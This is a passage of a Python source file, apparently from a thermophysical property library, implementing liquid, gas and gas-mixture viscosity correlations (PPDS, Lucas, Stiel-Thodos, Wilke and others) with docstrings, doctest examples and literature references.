Parameters
----------
Ts : list[float]
Temperatures of the experimental data points, [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [1/K]
D : float
Coefficient, [1/K^2]
Returns
-------
jac : list[list[float, 4], len(Ts)]
Matrix of derivatives of the equation with respect to the fitting
parameters, [various]
'''
N = len(Ts)
# out = np.zeros((N, 4)) # numba: uncomment
out = [[0.0]*4 for _ in range(N)] # numba: delete
for i in range(N):
T = Ts[i]
r = out[i]
x0 = 1.0/T
x1 = 10.0**(A + B*x0 + T*(C + D*T))*2.302585092994046
r[0] = x1
r[1] = x0*x1
r[2] = T*x1
r[3] = T*T*x1
return out
def PPDS9(T, A, B, C, D, E):
r'''Calculate the viscosity of a liquid using the 5-term exponential power
fit developed by the PPDS and named PPDS equation 9.
.. math::
\mu = E \exp\left[A \left(\frac{C-T}{T-D}\right)^{1/3}
+ B \left(\frac{C-T}{T-D}\right)^{4/3} \right]
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [-]
C : float
Coefficient, [K]
D : float
Coefficient, [K]
E : float
Coefficient, [Pa*s]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
No other source for these coefficients has been found.
There can be a singularity in this equation when `T` approaches `C` or
`D`; it may be helpful to take as a limit to this equation `D` + 5 K.
Examples
--------
>>> PPDS9(400.0, 1.74793, 1.33728, 482.347, 41.78, 9.963e-05)
0.00035091137378230684
References
----------
.. [1] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
Berlin; New York:: Springer, 2010.
'''
term = (C - T)/(T-D)
if term < 0.0:
term1 = -((T - C)/(T-D))**(1/3.)
else:
term1 = term**(1/3.)
term2 = term*term1
mu = E*trunc_exp(A*term1 + B*term2)
return mu
def dPPDS9_dT(T, A, B, C, D, E):
r'''Calculate the temperature derivative of viscosity of a liquid using
the 5-term exponential power fit developed by the PPDS and named PPDS
equation 9.
Normally, the temperature derivative is:
.. math::
\frac{\partial \mu}{\partial T} = E \left(\frac{A \sqrt[3]{\frac{C - T}
{- D + T}} \left(- D + T\right) \left(- \frac{C - T}{3 \left(- D
+ T\right)^{2}} - \frac{1}{3 \left(- D + T\right)}\right)}{C - T}
- \frac{B \sqrt[3]{\frac{C - T}{- D + T}} \left(C - T\right)}{\left(
- D + T\right)^{2}} + B \sqrt[3]{\frac{C - T}{- D + T}} \left(- \frac{
C - T}{3 \left(- D + T\right)^{2}} - \frac{1}{3 \left(- D + T\right)}
\right) - \frac{B \sqrt[3]{\frac{C - T}{- D + T}}}{- D + T}\right)
e^{A \sqrt[3]{\frac{C - T}{- D + T}} + \frac{B \sqrt[3]{\frac{C - T}
{- D + T}} \left(C - T\right)}{- D + T}}
For the low-temperature region:
.. math::
\frac{\partial \mu}{\partial T} = E \left(- \frac{A \sqrt[3]{\frac{
- C + T}{- D + T}} \left(- D + T\right) \left(- \frac{- C + T}{3
\left(- D + T\right)^{2}} + \frac{1}{3 \left(- D + T\right)}\right)
}{- C + T} + \frac{B \sqrt[3]{\frac{- C + T}{- D + T}} \left(C
- T\right)}{\left(- D + T\right)^{2}} + \frac{B \sqrt[3]{\frac{
- C + T}{- D + T}}}{- D + T} - \frac{B \sqrt[3]{\frac{- C + T}{
- D + T}} \left(C - T\right) \left(- \frac{- C + T}{3 \left(- D
+ T\right)^{2}} + \frac{1}{3 \left(- D + T\right)}\right)}{- C
+ T}\right) e^{- A \sqrt[3]{\frac{- C + T}{- D + T}} - \frac{B
\sqrt[3]{\frac{- C + T}{- D + T}} \left(C - T\right)}{- D + T}}
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [-]
C : float
Coefficient, [K]
D : float
Coefficient, [K]
E : float
Coefficient, [Pa*s]
Returns
-------
dmu_dT : float
First temperature derivative of liquid viscosity, [Pa*s]
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
Examples
--------
>>> dPPDS9_dT(400.0, 1.74793, 1.33728, 482.347, 41.78, 9.963e-05)
(-3.186540635882627e-06, 0.00035091137378230684)
References
----------
.. [1] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
Berlin; New York:: Springer, 2010.
'''
term = (C - T)/(T-D)
if term < 0.0:
x0 = 1.0/(-D + T)
x1 = x0*(-C + T)
x2 = -T
x3 = C + x2
x4 = B*x3
mu = E*trunc_exp(-x1**(1.0/3.0)*(A + x0*x4))
x6 = D + x2
x7 = 1.0/x6
x8 = x0*(x1 - 1.0)*(1.0/3.0)
dmu_dT = -mu*(x3*x7)**(1.0/3.0)*(-A*x6*x8/x3 + B*x7 + B*x8 - x4*x7*x7)
else:
x0 = -T
x1 = C + x0
x2 = D + x0
x3 = 1.0/x2
x4 = x1*x3
x5 = (-x4)**(1.0/3.0)
mu = E*trunc_exp(x5*(A - B*x4))
x7 = 1.0/(-D + T)
x8 = x7*(x1*x7 + 1.0)*(1.0/3.0)
dmu_dT = -x5*mu*(-A*x2*x8/x1 + B*x1*x3*x3 - B*x3 + B*x8)
return (dmu_dT, mu)
def mu_TDE(T, A, B, C, D):
r'''Calculate the viscosity of a liquid using the 4-term exponential
inverse-temperature fit equation used in NIST's TDE.
.. math::
\mu = \exp\left[A + \frac{B}{T} + \frac{C}{T^2} + \frac{D}{T^3}\right]
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [K^2]
D : float
Coefficient, [K^3]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
Examples
--------
Coefficients for isooctane at 400 K, as shown in [1]_.
>>> mu_TDE(400.0, -14.0878, 3500.26, -678132.0, 6.17706e7)
0.0001822175281438
References
----------
.. [1] "ThermoData Engine (TDE103b V10.1) User`s Guide."
https://trc.nist.gov/TDE/Help/TDE103b/Eqns-Pure-ViscositySatL/ViscosityL.htm.
'''
T_inv = 1.0/T
expr = A + T_inv*(B + T_inv*(C + D*T_inv))
return trunc_exp(expr)
def PPDS5(T, Tc, a0, a1, a2):
r'''Calculate the viscosity of a low-pressure gas using the 3-term
exponential power fit developed by the PPDS and named PPDS equation 5.
.. math::
\mu = \frac{a_0 T_r}{\left( 1 + a_1 T_r^{a_2}(T_r - 1) \right)^{1/6}}
Parameters
----------
T : float
Temperature of fluid [K]
Tc : float
Critical temperature of fluid [K]
a0 : float
Coefficient, [-]
a1 : float
Coefficient, [-]
a2 : float
Coefficient, [-]
Returns
-------
mu : float
Low pressure gas viscosity, [Pa*s]
Notes
-----
Examples
--------
Sample coefficients for n-pentane in [1]_, at 350 K:
>>> PPDS5(T=350.0, Tc=470.008, a0=1.08003e-5, a1=0.19583, a2=0.811897)
8.096643275836e-06
References
----------
.. [1] "ThermoData Engine (TDE103b V10.1) User`s Guide."
https://trc.nist.gov/TDE/Help/TDE103b/Eqns-Pure-ViscosityG/PPDS5-ViscosityGas.htm.
'''
Tr = T/Tc
return a0*Tr/(1.0 + a1*(Tr - 1.0)*Tr**a2)**(1.0/6.0)
def Letsou_Stiel(T, MW, Tc, Pc, omega):
r'''Calculates the viscosity of a liquid using an emperical model
developed in [1]_. However. the fitting parameters for tabulated values
in the original article are found in ChemSep.
.. math::
\xi = \frac{2173.424 T_c^{1/6}}{\sqrt{MW} P_c^{2/3}}
.. math::
\xi^{(0)} = (1.5174 - 2.135T_r + 0.75T_r^2)\cdot 10^{-5}
.. math::
\xi^{(1)} = (4.2552 - 7.674 T_r + 3.4 T_r^2)\cdot 10^{-5}
.. math::
\mu = (\xi^{(0)} + \omega \xi^{(1)})/\xi
Parameters
----------
T : float
Temperature of fluid [K]
MW : float
Molwcular weight of fluid [g/mol]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
omega : float
Acentric factor of compound
Returns
-------
mu_l : float
Viscosity of liquid, [Pa*s]
Notes
-----
The form of this equation is a polynomial fit to tabulated data.
The fitting was performed by the DIPPR. This is DIPPR Procedure 8G: Method
for the viscosity of pure, nonhydrocarbon liquids at high temperatures
internal units are SI standard. [1]_'s units were different.
DIPPR test value for ethanol is used.
Average error 34%. Range of applicability is 0.76 < Tr < 0.98.
Examples
--------
>>> Letsou_Stiel(400., 46.07, 516.25, 6.383E6, 0.6371)
0.0002036150875308
References
----------
.. [1] Letsou, Athena, and Leonard I. Stiel. "Viscosity of Saturated
Nonpolar Liquids at Elevated Pressures." AIChE Journal 19, no. 2 (1973):
409-11. doi:10.1002/aic.690190241.
'''
Tr = T/Tc
xi0 = (1.5174 - Tr*(2.135 - 0.75*Tr))*1E-5
xi1 = (4.2552 - Tr*(7.674 - 3.4*Tr))*1E-5
xi = 2173.424*Tc**(1.0/6.)/sqrt(MW)*Pc**(-2.0/3.)
return (xi0 + omega*xi1)/xi
def Przedziecki_Sridhar(T, Tm, Tc, Pc, Vc, Vm, omega, MW):
r'''Calculates the viscosity of a liquid using an emperical formula
developed in [1]_.
.. math::
\mu=\frac{V_o}{E(V-V_o)}
.. math::
E=-1.12+\frac{V_c}{12.94+0.10MW-0.23P_c+0.0424T_{m}-11.58(T_{m}/T_c)}
.. math::
V_o = 0.0085\omega T_c-2.02+\frac{V_{m}}{0.342(T_m/T_c)+0.894}
Parameters
----------
T : float
Temperature of the fluid [K]
Tm : float
Melting point of fluid [K]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
Vc : float
Critical volume of the fluid [m^3/mol]
Vm : float
Molar volume of the fluid at temperature [K]
omega : float
Acentric factor of compound
MW : float
Molwcular weight of fluid [g/mol]
Returns
-------
mu_l : float
Viscosity of liquid, [Pa*s]
Notes
-----
A test by Reid (1983) is used, but only mostly correct.
This function is not recommended.
Internal units are bar and mL/mol.
Examples
--------
>>> Przedziecki_Sridhar(383., 178., 591.8, 41E5, 316E-6, 95E-6, .263, 92.14)
0.00021981479956033846
References
----------
.. [1] Przedziecki, J. W., and T. Sridhar. "Prediction of Liquid
Viscosities." AIChE Journal 31, no. 2 (February 1, 1985): 333-35.
doi:10.1002/aic.690310225.
'''
Pc = Pc*1e-5 # Pa to atm
Vm, Vc = Vm*1E6, Vc*1E6 # m^3/mol to mL/mol
Tc_inv = 1.0/Tc
Tr = T*Tc_inv
Tr2 = Tr*Tr
Gamma = 0.29607 - 0.09045*Tr - 0.04842*Tr2
VrT = 0.33593 - 0.33953*Tr + 1.51941*Tr2 - 2.02512*Tr*Tr2 + 1.11422*Tr2*Tr2
V = VrT*(1.0 - omega*Gamma)*Vc
Vo = 0.0085*omega*Tc - 2.02 + Vm/(0.342*(Tm*Tc_inv) + 0.894) # checked
E = -1.12 + Vc/(12.94 + 0.1*MW - 0.23*Pc + 0.0424*Tm - 11.58*(Tm*Tc_inv))
return Vo/(E*(V-Vo))*1e-3
### Viscosity of Dense Liquids
def Lucas(T, P, Tc, Pc, omega, Psat, mu_l):
r'''Adjustes for pressure the viscosity of a liquid using an emperical
formula developed in [1]_, but as discussed in [2]_ as the original source
is in German.
.. math::
\frac{\mu}{\mu_{sat}}=\frac{1+D(\Delta P_r/2.118)^A}{1+C\omega \Delta P_r}
.. math::
\Delta P_r = \frac{P-P^{sat}}{P_c}
.. math::
A=0.9991-\frac{4.674\times 10^{-4}}{1.0523T_r^{-0.03877}-1.0513}
.. math::
D = \frac{0.3257}{(1.0039-T_r^{2.573})^{0.2906}}-0.2086
.. math::
C = -0.07921+2.1616T_r-13.4040T_r^2+44.1706T_r^3-84.8291T_r^4+
96.1209T_r^5-59.8127T_r^6+15.6719T_r^7
Parameters
----------
T : float
Temperature of fluid [K]
P : float
Pressure of fluid [Pa]
Tc: float
Critical point of fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
omega : float
Acentric factor of compound
Psat : float
Saturation pressure of the fluid [Pa]
mu_l : float
Viscosity of liquid at 1 atm or saturation, [Pa*s]
Returns
-------
mu_l_dense : float
Viscosity of liquid, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
The example is from Reid (1987); all results agree.
Above several thousand bar, this equation does not represent true behavior.
If Psat is larger than P, the fluid may not be liquid; dPr is set to 0.
Examples
--------
>>> Lucas(300., 500E5, 572.2, 34.7E5, 0.236, 0, 0.00068) # methylcyclohexane
0.0010683738499316494
References
----------
.. [1] Lucas, Klaus. "Ein Einfaches Verfahren Zur Berechnung Der
Viskositat von Gasen Und Gasgemischen." Chemie Ingenieur Technik 46, no. 4
(February 1, 1974): 157-157. doi:10.1002/cite.330460413.
.. [2] Reid, Robert C.; Prausnitz, John M.; Poling, Bruce E.
Properties of Gases and Liquids. McGraw-Hill Companies, 1987.
'''
Tr = min(T/Tc, 1.0)
C = Tr*(Tr*(Tr*(Tr*(Tr*(Tr*(15.6719*Tr - 59.8127) + 96.1209) - 84.8291) + 44.1706) - 13.404) + 2.1616) - 0.07921
D = 0.3257*(1.0039-Tr**2.573)**-0.2906 - 0.2086
A = 0.9991 - 4.674E-4/(1.0523*Tr**-0.03877 - 1.0513)
dPr = (P-Psat)/Pc
if dPr < 0.0:
dPr = 0.0
return (1. + D*(dPr*(1.0/2.118))**A)/(1. + C*omega*dPr)*mu_l
### Viscosity of liquid mixtures
### Viscosity of Gases - low pressure
def Yoon_Thodos(T, Tc, Pc, MW):
r'''Calculates the viscosity of a gas using an emperical formula
developed in [1]_.
.. math::
\eta \xi \times 10^8 = 46.10 T_r^{0.618} - 20.40 \exp(-0.449T_r) + 1
9.40\exp(-4.058T_r)+1
.. math::
\xi = 2173.424 T_c^{1/6} MW^{-1/2} P_c^{-2/3}
Parameters
----------
T : float
Temperature of the fluid [K]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
MW : float
Molwcular weight of fluid [g/mol]
Returns
-------
mu_g : float
Viscosity of gas, [Pa*s]
Notes
-----
This equation has been tested. The equation uses SI units only internally.
The constant 2173.424 is an adjustment factor for units.
Average deviation within 3% for most compounds.
Greatest accuracy with dipole moments close to 0.
Hydrogen and helium have different coefficients, not implemented.
This is DIPPR Procedure 8B: Method for the Viscosity of Pure,
non hydrocarbon, nonpolar gases at low pressures
Examples
--------
>>> Yoon_Thodos(300., 556.35, 4.5596E6, 153.8)
1.019488572777e-05
References
----------
.. [1] Yoon, Poong, and George Thodos. "Viscosity of Nonpolar Gaseous
Mixtures at Normal Pressures." AIChE Journal 16, no. 2 (1970): 300-304.
doi:10.1002/aic.690160225.
'''
Tr = T/Tc
xi = 2173.4241*Tc**(1/6.)/sqrt(MW)*Pc**(-2.0/3.)
a = 46.1
b = 0.618
c = 20.4
d = -0.449
e = 19.4
f = -4.058
return (1. + a*Tr**b - c * exp(d*Tr) + e*exp(f*Tr))/(1E8*xi)
def Stiel_Thodos(T, Tc, Pc, MW):
r'''Calculates the viscosity of a gas using an emperical formula
developed in [1]_.
if :math:`T_r > 1.5`:
.. math::
\mu_g = 17.78\times 10^{-5} (4.58T_r - 1.67)^{0.625}/\xi
else:
.. math::
\mu_g = 34\times 10^{-5} T_r^{0.94}/\xi
.. math::
\xi = \frac{T_c^{(1/6)}}{\sqrt{MW} P_c^{2/3}}
Parameters
----------
T : float
Temperature of the fluid [K]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
MW : float
Molwcular weight of fluid [g/mol]
Returns
-------
mu_g : float
Viscosity of gas, [Pa*s]
Notes
-----
Claimed applicability from 0.2 to 5 atm.
Developed with data from 52 nonpolar, and 53 polar gases.
internal units are poise and atm.
Seems to give reasonable results.
Examples
--------
>>> Stiel_Thodos(300., 556.35, 4.5596E6, 153.8) #CCl4
1.040892622360e-05
References
----------
.. [1] Stiel, Leonard I., and George Thodos. "The Viscosity of Nonpolar
Gases at Normal Pressures." AIChE Journal 7, no. 4 (1961): 611-15.
doi:10.1002/aic.690070416.
'''
Pc = Pc*(1.0/101325.)
Tr = T/Tc
xi = Tc**(1/6.)/(sqrt(MW)*Pc**(2/3.))
if Tr > 1.5:
mu_g = 17.78E-5*(4.58*Tr-1.67)**0.625/xi
else:
mu_g = 34E-5*Tr**0.94/xi
return mu_g*1e-3
def Lucas_gas(T, Tc, Pc, Zc, MW, dipole=0.0, CASRN=None):
r'''Estimate the viscosity of a gas using an emperical
formula developed in several sources, but as discussed in [1]_ as the
original sources are in German or merely personal communications with the
authors of [1]_.
.. math::
\eta = \left[0.807T_r^{0.618}-0.357\exp(-0.449T_r) + 0.340\exp(-4.058
T_r) + 0.018\right]F_p^\circ F_Q^\circ /\xi
.. math::
F_p^\circ=1, 0 \le \mu_{r} < 0.022
.. math::
F_p^\circ = 1+30.55(0.292-Z_c)^{1.72}, 0.022 \le \mu_{r} < 0.075
.. math::
F_p^\circ = 1+30.55(0.292-Z_c)^{1.72}|0.96+0.1(T_r-0.7)| 0.075 < \mu_{r}
.. math::
F_Q^\circ = 1.22Q^{0.15}\left\{ 1+0.00385[(T_r-12)^2]^{1/M}\text{sign}
(T_r-12)\right\}
.. math::
\mu_r = 52.46 \frac{\mu^2 P_c}{T_c^2}
.. math::
\xi=0.176\left(\frac{T_c}{MW^3 P_c^4}\right)^{1/6}
Parameters
----------
T : float
Temperature of fluid [K]
Tc: float
Critical point of fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
Zc : float
Critical compressibility of the fluid [Pa]
dipole : float
Dipole moment of fluid [debye]
CASRN : str, optional
CAS of the fluid
Returns
-------
mu_g : float
Viscosity of gas, [Pa*s]
Notes
-----
The example is from [1]_; all results agree.
Viscosity is calculated in micropoise, and converted to SI internally (1E-7).
Q for He = 1.38; Q for H2 = 0.76; Q for D2 = 0.52.
Examples
--------
>>> Lucas_gas(T=550., Tc=512.6, Pc=80.9E5, Zc=0.224, MW=32.042, dipole=1.7)
1.7822676912698925e-05
References
----------
.. [1] Reid, Robert C.; Prausnitz, John M.; Poling, Bruce E.
Properties of Gases and Liquids. McGraw-Hill Companies, 1987.
'''
Tc_inv = 1.0/Tc
Tr = T*Tc_inv
MW_inv = 1.0/MW
Pc_bar = Pc*1e-5
xi = 0.176*(Tc*MW_inv*MW_inv*MW_inv/(Pc_bar*Pc_bar*Pc_bar*Pc_bar))**(1.0/6.0) # bar arrording to example in Poling
if dipole is None:
dipole = 0.0
dipoler = 52.46*dipole*dipole*Pc_bar*Tc_inv*Tc_inv # bar arrording to example in Poling
if dipoler < 0.022:
Fp = 1.0
elif 0.022 <= dipoler < 0.075:
Fp = 1.0 + 30.55*(0.292 - Zc)**1.72
else:
Fp = 1.0 + 30.55*(0.292 - Zc)**1.72*abs(0.96 + 0.1*(Tr - 0.7))
FQ = 1.0
if CASRN is not None:
Q = 0.0
if CASRN == '7440-59-7':
Q = 1.38
elif CASRN == '1333-74-0':
Q = 0.76
elif CASRN == '7782-39-0':
Q = 0.52
if Q != 0.0:
if Tr - 12.0 > 0.0:
value = 1.0
else:
value = -1.0
x0 = (Tr-12.0)
FQ = 1.22*Q**0.15*(1.0 + 0.00385*(x0*x0)**(MW_inv)*value)
eta = (0.807*Tr**0.618 - 0.357*exp(-0.449*Tr) + 0.340*exp(-4.058*Tr) + 0.018)*Fp*FQ/xi
return eta*1E-7
def viscosity_gas_Gharagheizi(T, Tc, Pc, MW):
r'''Calculates the viscosity of a gas using an emperical formula
developed in [1]_.
.. math::
\mu = 10^{-7} | 10^{-5} P_cT_r + \left(0.091-\frac{0.477}{M}\right)T +
M \left(10^{-5}P_c-\frac{8M^2}{T^2}\right)
\left(\frac{10.7639}{T_c}-\frac{4.1929}{T}\right)|
Parameters
----------
T : float
Temperature of the fluid [K]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
MW : float
Molwcular weight of fluid [g/mol]
Returns
-------
mu_g : float
Viscosity of gas, [Pa*s]
Notes
-----
Example is first point in supporting information of article, for methane.
This is the prefered function for gas viscosity.
7% average relative deviation. Deviation should never be above 30%.
Developed with the DIPPR database. It is believed theoretically predicted values
are included in the correlation.
Under 0.2Tc, this correlation has been modified to provide values at the
limit.
Examples
--------
>>> viscosity_gas_Gharagheizi(120., 190.564, 45.99E5, 16.04246)
5.215761625399613e-06
References
----------
.. [1] Gharagheizi, Farhad, Ali Eslamimanesh, Mehdi Sattari, Amir H.
Mohammadi, and Dominique Richon. "Corresponding States Method for
Determination of the Viscosity of Gases at Atmospheric Pressure."
Industrial & Engineering Chemistry Research 51, no. 7
(February 22, 2012): 3179-85. doi:10.1021/ie202591f.
'''
Tr = T/Tc
if Tr < 0.2:
Tr = 0.2
T = 0.2*Tc
mu_g = 1E-5*Pc*Tr + (0.091 - 0.477/MW)*T + MW*(1E-5*Pc - 8.0*MW*MW/(T*T))*(10.7639/Tc - 4.1929/T)
mu_g = 1e-7*mu_g
return mu_g
### Viscosity of gas mixtures
def Herning_Zipperer(zs, mus, MWs, MW_roots=None):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_.
.. math::
\mu = \frac{\sum x_i \mu_i \sqrt{MW_i}}
{\sum x_i \sqrt{MW_i}}
Parameters
----------
zs : float
Mole fractions of components, [-]
mus : float
Gas viscosities of all components, [Pa*s]
MWs : float
Molecular weights of all components, [g/mol]
MW_roots : float, optional
Square roots of molecular weights of all components, [g^0.5/mol^0.5]
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
The original source has not been reviewed.
Adding the square roots can speed up the calculation.
Examples
--------
>>> Herning_Zipperer([0.5, 0.25, 0.25], [1.78e-05, 1.12e-05, 9.35e-06], [28.0134, 16.043, 30.07])
1.4174908599465168e-05
References
----------
.. [1] Herning, F. and Zipperer, L,: "Calculation of the Viscosity of
Technical Gas Mixtures from the Viscosity of Individual Gases, german",
Gas u. Wasserfach (1936) 79, No. 49, 69.
'''
N = len(zs)
if MW_roots is None:
MW_roots = [0.0]*N
for i in range(N):
MW_roots[i] = sqrt(MWs[i])
denominator = k = 0.0
for i in range(N):
v = zs[i]*MW_roots[i]
k += v*mus[i]
denominator += v
return k/denominator
def Wilke(ys, mus, MWs):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_.
.. math::
\eta_{mix} = \sum_{i=1}^n \frac{y_i \eta_i}{\sum_{j=1}^n y_j \phi_{ij}}
.. math::
\phi_{ij} = \frac{(1 + \sqrt{\eta_i/\eta_j}(MW_j/MW_i)^{0.25})^2}
{\sqrt{8(1+MW_i/MW_j)}}
Parameters
----------
ys : float
Mole fractions of gas components, [-]
mus : float
Gas viscosities of all components, [Pa*s]
MWs : float
Molecular weights of all components, [g/mol]
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
The original source has not been reviewed or found.
See Also
--------
Wilke_prefactors
Wilke_prefactored
Wilke_large
Examples
--------
>>> Wilke([0.05, 0.95], [1.34E-5, 9.5029E-6], [64.06, 46.07])
9.701614885866193e-06
References
----------
.. [1] Wilke, C. R. "A Viscosity Equation for Gas Mixtures." The Journal of
Chemical Physics 18, no. 4 (April 1, 1950): 517-19.
https://doi.org/10.1063/1.1747673.
'''
cmps = range(len(ys))
phis = [[(1.0 + (mus[i]/mus[j])**0.5*(MWs[j]/MWs[i])**0.25)**2.0/(8.0*(1.0 + MWs[i]/MWs[j]))**0.5
for j in cmps] for i in cmps]
# Some publications show the denominator sum should not consider i ==j and have only the
# mole fraction but this reduces to that as phi[i][i] == 1
return sum([ys[i]*mus[i]/sum([ys[j]*phis[i][j] for j in cmps]) for i in cmps])
def Wilke_prefactors(MWs):
r'''The :obj:`Wilke` gas viscosity method can be sped up by precomputing several
matrices. The memory used is proportional to N^2, so it can be significant,
but is still a substantial performance increase even when they are so large
they cannot fit into cached memory. These matrices are functions of
molecular weights only. These are used by the :obj:`Wilke_prefactored` function.
.. math::
t0_{i,j} = \frac{ \sqrt{\frac{MW_{j}}{MW_{i}}}}{
\sqrt{\frac{8 MW_{i}}{MW_{j}} + 8}}
.. math::
t1_{i,j} = \frac{2 \sqrt[4]{\frac{MW_{j}}{MW_{i}}}
}{\sqrt{\frac{8 MW_{i}}{MW_{j}} + 8}}
.. math::
t2_{i,j} = \frac{1}{\sqrt{\frac{8 MW_{i}}{MW_{j}} + 8}}
Parameters
----------
MWs : list[float]
Molecular weights of all components, [g/mol]
Returns
-------
t0s : list[list[float]]
First terms, [-]
t1s : list[list[float]]
Second terms, [-]
t2s : list[list[float]]
Third terms, [-]
Notes
-----
These terms are derived as follows using SymPy. The viscosity terms are not
known before hand so they are not included in the factors, but otherwise
these parameters simplify the computation of the :math:`\phi_{ij}` term
to the following:
.. math::
\phi_{ij} = \frac{\mu_i}{\mu_j}t0_{i,j} + \sqrt{\frac{\mu_i}{\mu_j}}t1_{i,j} + t2_{i,j}
>>> from sympy import * # doctest: +SKIP
>>> MWi, MWj, mui, muj = symbols('MW_i, MW_j, mu_i, mu_j') # doctest: +SKIP
>>> f = (1 + sqrt(mui/muj)*(MWj/MWi)**Rational(1,4))**2 # doctest: +SKIP
>>> denom = sqrt(8*(1+MWi/MWj)) # doctest: +SKIP
>>> (expand(simplify(expand(f))/denom)) # doctest: +SKIP
mu_i*sqrt(MW_j/MW_i)/(mu_j*sqrt(8*MW_i/MW_j + 8)) + 2*(MW_j/MW_i)**(1/4)*sqrt(mu_i/mu_j)/sqrt(8*MW_i/MW_j + 8) + 1/sqrt(8*MW_i/MW_j + 8) # doctest: +SKIP
Examples
--------
>>> Wilke_prefactors([64.06, 46.07])
([[0.25, 0.19392193320396522], [0.3179655106303118, 0.25]], [[0.5, 0.421161930934918], [0.5856226024677849, 0.5]], [[0.25, 0.22867110638055677], [0.2696470380083788, 0.25]])
>>> Wilke_prefactored([0.05, 0.95], [1.34E-5, 9.5029E-6], *Wilke_prefactors([64.06, 46.07]))
9.701614885866193e-06
'''
cmps = range(len(MWs))
MWs_inv = [1.0/MWi for MWi in MWs]
phi_fact_invs = [[1.0/(8.0*(1.0 + MWs[i]*MWs_inv[j]))**0.5
for j in cmps] for i in cmps]
t0s = [[(MWs[j]*MWs_inv[i])**0.5*phi_fact_invs[i][j]
for j in cmps] for i in cmps]
t1s = [[2.0*(MWs[j]*MWs_inv[i])**0.25*phi_fact_invs[i][j]
for j in cmps] for i in cmps]
return t0s, t1s, phi_fact_invs
def Wilke_prefactored(ys, mus, t0s, t1s, t2s):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_, using precomputed parameters.
.. math::
\eta_{mix} = \sum_{i=1}^n \frac{y_i \eta_i}{\sum_{j=1}^n y_j \phi_{ij}}
.. math::
\phi_{ij} = \frac{\mu_i}{\mu_j}t0_{i,j} + \sqrt{\frac{\mu_i}{\mu_j}}
t1_{i,j} + t2_{i,j}
Parameters
----------
ys : float
Mole fractions of gas components, [-]
mus : float
Gas viscosities of all components, [Pa*s]
t0s : list[list[float]]
First terms, [-]
t1s : list[list[float]]
Second terms, [-]
t2s : list[list[float]]
Third terms, [-]
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
See Also
--------
Wilke_prefactors
Wilke
Wilke_large
Examples
--------
>>> Wilke_prefactored([0.05, 0.95], [1.34E-5, 9.5029E-6], *Wilke_prefactors([64.06, 46.07]))
9.701614885866193e-06
References
----------
.. [1] Wilke, C. R. "A Viscosity Equation for Gas Mixtures." The Journal of
Chemical Physics 18, no. 4 (April 1, 1950): 517-19.
https://doi.org/10.1063/1.1747673.
'''
N = len(ys)
mu_root_invs = [0.0]*N
mu_roots = [0.0]*N
mus_inv = [0.0]*N
for i in range(N):
# 1/sqrt(mus)
mu_root_invs[i] = muirtinv = 1.0/sqrt(mus[i])
# sqrt(mus)
mu_roots[i] = muirtinv*mus[i]
# 1/mus
mus_inv[i] = muirtinv*muirtinv
mu = 0.0
for i in range(N): # numba's p range does not help here
tot = 0.0
for j in range(N):
phiij = mus[i]*mus_inv[j]*t0s[i][j] + mu_roots[i]*mu_root_invs[j]*t1s[i][j] + t2s[i][j]
tot += ys[j]*phiij
mu += ys[i]*mus[i]/tot
return mu
""" # Alternate variant which may be able to be faster in parallel
N = len(ys)
mu_root_invs = [0.0]*N
mu_roots = [0.0]*N
mus_inv = [0.0]*N
tots = [0.0]*N
for i in range(N):
# 1/sqrt(mus)
mu_root_invs[i] = muirtinv = 1.0/sqrt(mus[i])
# sqrt(mus)
mu_roots[i] = muirtinv*mus[i]
# 1/mus
mus_inv[i] = muirtinv*muirtinv*ys[i]
mu_root_invs[i] *= ys[i]
mu = 0.0
for i in range(N):
tot = 0.0
# Not a symmetric matrix unfortunately
for j in range(N):
tot += ys[j]*t2s[i][j]
tots[i] += tot
for i in range(N):
tot1 = 0.0
for j in range(N):
tot1 += mus_inv[j]*t0s[i][j]
tots[i] += tot1*mus[i]
for i in range(N):
tot2 = 0.0
for j in range(N):
tot2 += mu_root_invs[j]*t1s[i][j]
tots[i] += tot2*mu_roots[i]
for i in range(N):
mu += ys[i]*mus[i]/tots[i]
return mu
"""
def Wilke_large(ys, mus, MWs):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_.
This function is a slightly faster version of :obj:`Wilke`. It achieves its
extra speed by avoiding some checks, some powers, and by allocating less
memory during the computation. For very large component vectors, this
function should be called instead.
Parameters
----------
ys : float
Mole fractions of gas components, [-]
mus : float
Gas viscosities of all components, [Pa*s]
MWs : float
Molecular weights of all components, [g/mol]
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
See Also
--------
Wilke_prefactors
Wilke_prefactored
Wilke
Examples
--------
>>> Wilke_large([0.05, 0.95], [1.34E-5, 9.5029E-6], [64.06, 46.07])
9.701614885866193e-06
References
----------
